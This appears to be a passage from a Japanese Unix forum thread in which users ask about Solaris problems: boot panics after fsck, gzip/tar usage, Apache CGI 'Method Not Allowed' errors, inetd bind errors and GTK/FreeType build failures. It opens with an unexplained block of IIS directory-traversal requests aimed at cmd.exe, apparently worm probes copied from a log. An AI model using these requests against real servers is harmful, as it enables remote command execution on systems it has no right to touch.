GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
皆さん、ありがとうございます。 結局、fsck -o b=***でやってみました。 全てyで答えその後mountして確認したところetcがないです。 ハードから立ち上げようとすると今度は Boot device: /pci@1f,0/pci@1,1/ide@3/disk@0,0:a File and args: -s SunOS Release 5.6 Version Generic_105181-23 [UNIX(R) System V Release 4.0] Copyright (c) 1983-1997, Sun Microsystems, Inc. WARNING: cannot open system file: etc/system panic[cpu0]/thread=0x10404000: read_binding_file: /etc/name_to_major file not fo und Fast Data Access MMU Miss が出ました。どうすればいいか誰かアドバイスして下さい。
>>127http://www.sun.com/io/released-patches.html >KERNEL 108529-08 Solaris 8 05/18/2001 Fixes problems booting Pentium 4 >systems. To install on a Pentium 4, patch must be applied to a network >install image. Fixes: Bug: 4408508 setup_mca() has extra, faulty >indirection; cause panic; >Bug: 4414557 setup_mca () MSR definitions incorrect for Pentium 4, >can't boot. Will be incorporated in Solaris 8 Update 5.
>>138 うーん......どつぼ状態ですねぇ...... とりあえず ブートして Select (b)oot or (i)nterpreter: (CD-ROMからのブート時は Select type of installation: ) というのが出てきた時に i と入力するとブートインタプリタに入るので そこから run kadb と入力するとカーネルデバッガからカーネルが呼ばれます
加えて、コマンド実行後の起動時に新たにエラーが出るようになりまし た。(dmesgから抜粋) Oct 10 23:32:14 solaris8 genunix: [ID 454863 kern.info] dump on /dev/dsk/c0d0s4 size 147 MB Oct 10 23:32:23 solaris8 savecore: [ID 570001 auth.error] reboot after panic: BAD TRAP: type=e (Page Fault) rp=efb5ecc8 addr=0 occurred in module "<unknown>" due to a NULL pointer dereference
"man resolv.conf"見ると nameserver Specifies the Internet address in dot-notation format of a name server that the resolver is to query. ってなってるから nameserverにはホスト名でなくIPアドレスを指定すべきでわ?
Solaris7(Sparc)なんですが、 http://sunsite.sut.ac.jp/pub/archives/gnu/ にあるgzファイルがどうしてもgzipで解凍できません。 bash、findutils、lessなど幾つか試したんですが ことごとくだめでした。 全て not in gzip format といわれてしまいます。 なにか他のユーティリティが必要なんでしょうか?
>>350 >>353 が書いてるように、zオプションが使える tar は GNU tar (gtar)といって、Solaris版の tar とは違う。 zオプションは、本来 >>354 のように書いていたのを楽するためのもので、どのUNIXでも使える訳ではないと心得るべし。 (ちなみに俺は gzip -dc hoge.tar.gz | tar xvf - と書く。細かい話でスマソ)
# metadb フラグ 最初のブロック ブロックカウント a m p luo 16 1034 /dev/dsk/c0t0d0s7 a p luo 1050 1034 /dev/dsk/c0t0d0s7 a p luo 16 1034 /dev/dsk/c0t1d0s7 a p luo 1050 1034 /dev/dsk/c0t1d0s7 a p luo 16 1034 /dev/dsk/c1t2d0s7 a p luo 1050 1034 /dev/dsk/c1t2d0s7 a p luo 16 1034 /dev/dsk/c1t3d0s7 a p luo 1050 1034 /dev/dsk/c1t3d0s7 a p luo 16 1034 /dev/dsk/c1t10d0s7 a p luo 1050 1034 /dev/dsk/c1t10d0s7 a p luo 16 1034 /dev/dsk/c1t11d0s7 a p luo 1050 1034 /dev/dsk/c1t11d0s7
solaris8% sysdef : : * * IPC Semaphores * 256 semaphore identifiers (SEMMNI) 2048 semaphores in system (SEMMNS) 30 undo structures in system (SEMMNU) 64 max semaphores per id (SEMMSL) 64 max operations per semop call (SEMOPM) 64 max undo entries per process (SEMUME) 32767 semaphore maximum value (SEMVMX) 16384 adjust on exit max value (SEMAEM) : :
Solaris8でapache_1.3.22をインストールしたんですけど、CGIがうまく動作しません。 -------------------------------------------------------------- Method Not Allowed The requested method POST is not allowed for the URL /~/cgi-bin/keiji.cgi. -------------------------------------------------------------- というエラーメッセージがでるのですが、どうすればいいのか教えてください。 大学での研究でサーバー立ち上げをしているのですが、ほとんど初心者です。
Nov 8 14:30:12 host inetd[162]: dtspc/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: printer/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: fs/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: chargen/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: daytime/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: discard/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: echo/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: time/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: finger/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: uucp/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: exec/tcp: bind: Address already in use Nov 8 14:30:12 host last message repeated 1 time Nov 8 14:30:12 host inetd[162]: login/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: shell/tcp: bind: Address already in use Nov 8 14:30:12 host last message repeated 1 time Nov 8 14:30:12 host inetd[162]: telnet/tcp: bind: Address already in use Nov 8 14:30:12 host inetd[162]: ftp/tcp: bind: Address already in use
FMVのPentium4でSCSIのみでハードディスクを付けてSolaris8を インストールしようとして、DISK1/2はインストールできるのにリブートすると 「operating system not found!」 って怒られて2/2のインストール画面にならないのですがどうしたらよいですか? 普通にIDEのディスクを付けるとインストールができるのですが… SUNに聞いてもよくわからん回答だし… SCSIをBIOSの設定で読み込めればできると思うのですが、それができないようでして
grep inetd /etc/rc?.d/* の結果は、 # grep inetd /etc/rc?.d/* /etc/rc0.d/K42inetsvc: /usr/bin/pkill -x -u 0 'in.named|inetd' /etc/rc0.d/K42inetsvc:# Run inetd in "standalone" mode (-s flag) so that it doesn't have /etc/rc0.d/K42inetsvc:# to submit to the will of SAF. Why did we ever let them change inetd? /etc/rc0.d/K42inetsvc:/usr/sbin/inetd -s & /etc/rc1.d/K42inetsvc: /usr/bin/pkill -x -u 0 'in.named|inetd' /etc/rc1.d/K42inetsvc:# Run inetd in "standalone" mode (-s flag) so that it doesn't have /etc/rc1.d/K42inetsvc:# to submit to the will of SAF. Why did we ever let them change inetd? /etc/rc1.d/K42inetsvc:/usr/sbin/inetd -s & /etc/rc2.d/S72inetsvc: /usr/bin/pkill -x -u 0 'in.named|inetd' /etc/rc2.d/S72inetsvc:# Run inetd in "standalone" mode (-s flag) so that it doesn't have /etc/rc2.d/S72inetsvc:# to submit to the will of SAF. Why did we ever let them change inetd? /etc/rc2.d/S72inetsvc:/usr/sbin/inetd -s & /etc/rc2.d/S72inetsvc~: /usr/bin/pkill -x -u 0 'in.named|inetd' /etc/rc2.d/S72inetsvc~:# Run inetd in "standalone" mode (-s flag) so that it doesn't have /etc/rc2.d/S72inetsvc~:# to submit to the will of SAF. Why did we ever let them change inetd? /etc/rc2.d/S72inetsvc~:/usr/sbin/inetd -s & /etc/rc2.d/S73cachefs.daemon:inetconf=/etc/inet/inetd.conf /etc/rcS.d/K42inetsvc: /usr/bin/pkill -x -u 0 'in.named|inetd' /etc/rcS.d/K42inetsvc:# Run inetd in "standalone" mode (-s flag) so that it doesn't have /etc/rcS.d/K42inetsvc:# to submit to the will of SAF. Why did we ever let them change inetd? /etc/rcS.d/K42inetsvc:/usr/sbin/inetd -s & となります。 本当にすみません。
ちなみに、nfsfindを見ると下記のように書いてあったり # Check shared NFS filesystems for .nfs* files that # are more than a week old. # # These files are created by NFS clients when an open file # is removed. To preserve some semblance of Unix semantics # the client renames the file to a unique name so that the # file appears to have been removed from the directory, but # is still usable by the process that has the file open.
Type control-d to proceed with normal startup; (orgive root password for system maintenance);
と言われるようにまりした。
Ctrl-Dを押しますと表示されます起動メッセージの中に X-server can not be started on display :0... とあります。
その後 NOV12 12:31;49 cssd:starting ccv.sh(pid#363) (pidの値はインクリメントされていきます。) The process"ccv.sh" has been exitend whith retcord #24320 とのメッセージが延々と表示され続けます。
checking for GLIB - version >= 1.2.0... no *** Could not run GLIB test program, checking why... *** The test program compiled, but did not run. This usually means *** that the run-time linker is not finding GLIB or finding the wrong *** version of GLIB. If it is not finding GLIB, you'll need to set your *** LD_LIBRARY_PATH environment variable, or edit /etc/ld.so.conf to point *** to the installed location Also, make sure you have run ldconfig if that *** is required on your system *** *** If you have an old version installed, it is best to remove it, although *** you may also be able to get things to work by modifying LD_LIBRARY_PATH *** *** If you have a RedHat 5.0 system, you should remove the GTK package that *** came with the system with the command *** *** rpm --erase --nodeps gtk gtk-devel configure: error: *** GLIB 1.2.0 or better is required. The latest version of GLIB *** is always available from ftp://ftp.gtk.org/. と出てMakefileが作れません。 glib-config --version で確認しても1.2.0となっているんですが、失敗する原因が僕のレベルじゃ分かりません。 どなたかわかる方がいたら是非教えてください。
717 :ernest :01/11/12 15:12
ありがとうございます。PCはunixです。 いろいろやっているうちに取り出しボタンは 反応するようになったのですが、 cd-romを入れても認識されていないようです。 df-kで調べてみてもcd-romに対応しているものはなさそうです。 cd-romからbootするようにしても(boot cdrom) No Device なんて言われてしまいます。 とりあえずejectのパラメータとして /dev/dsk 配下の c0t?d0s? を全部実行したのですが >Inappropriate ioctl for device やら >No such device or address 言われてしまいます。
checking for gtk-config... /opt/gnome-1.4/bin/gtk-config checking for GTK - version >= 1.2.0... no *** Could not run GTK test program, checking why... *** The test program compiled, but did not run. This usually means *** that the run-time linker is not finding GTK or finding the wrong *** version of GTK. If it is not finding GTK, you'll need to set your *** LD_LIBRARY_PATH environment variable, or edit /etc/ld.so.conf to point *** to the installed location Also, make sure you have run ldconfig if that *** is required on your system *** *** If you have an old version installed, it is best to remove it, although *** you may also be able to get things to work by modifying LD_LIBRARY_PATH *** *** If you have a RedHat 5.0 system, you should remove the GTK package that *** came with the system with the command *** *** rpm --erase --nodeps gtk gtk-devel
このようなエラーが出てしまい make を通すことができません。 上のエラーではgnome-1.4 の gtkを使ってますが、 別ディレクトリにパッケージでインストールしたgtkを用いてもだめでした。
Please specify prototyping behavior for FreeType.xs (see perlxs manual) gcc -c -I/usr/local/X11R6.3/include -fno-strict-aliasing -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O -DVERSION=\"1.2\" -DXS_VERSION=\"1.2\" -fPIC -I/usr/local/lib/perl5/5.6.1/i86pc-solaris/CORE FreeType.c FreeType.c: In function `XS_FreeType_TT_Done_FreeType': FreeType.c:418: `na' undeclared (first use in this function) FreeType.c:418: (Each undeclared identifier is reported only once FreeType.c:418: for each function it appears in.) FreeType.c: In function `XS_FreeType_TT_Set_Raster_Gray_Palette': FreeType.c:449: `na' undeclared (first use in this function) FreeType.c: In function `XS_FreeType_TT_Open_Face': FreeType.c:486: `na' undeclared (first use in this function) FreeType.c: In function `XS_FreeType_TT_Open_Collection': FreeType.c:518: `na' undeclared (first use in this function) FreeType.c: In function `XS_FreeType_TT_Get_Face_Properties': FreeType.c:548: `na' undeclared (first use in this function) FreeType.c: In function `XS_FreeType_TT_Flush_Face': FreeType.c:578: `na' undeclared (first use in this function) FreeType.c: In function `XS_FreeType_TT_Close_Face': FreeType.c: In function `XS_FreeType_TT_Get_CharMap_Count': ・ 中略 ・
FreeType.c: In function `XS_FreeType_TT_Get_Name_ID': FreeType.c:1566: `na' undeclared (first use in this function) FreeType.c: In function `XS_FreeType_TT_Get_Name_String': FreeType.c:1602: `na' undeclared (first use in this function) make[1]: *** [FreeType.o] Error 1 make[1]: Leaving directory `/opt/pkg/perlftlib-1.2/FreeType' make: *** [FreeType/blib/arch/auto/FreeType/FreeType.so] Error 2
unix/unix.o unix/unix.cpp:85: conflicting types for `typedef void (* SIG_TYP)()' /usr/include/sys/iso/signal_iso.h:87: previous declaration as `typedef void (* SIG_TYP)(int)' unix/unix.cpp: In function `void InitTimer()': unix/unix.cpp:1025: assignment to `void (*)(int)' from `void (*)()' unix/unix.cpp: In function `bool8 S9xOpenSoundDevice(int, unsigned char, int)': unix/unix.cpp:1407: name lookup of `i' changed for new ANSI `for' scoping unix/unix.cpp:1404: using obsolete binding at `i' make: *** [unix/unix.o] Error 1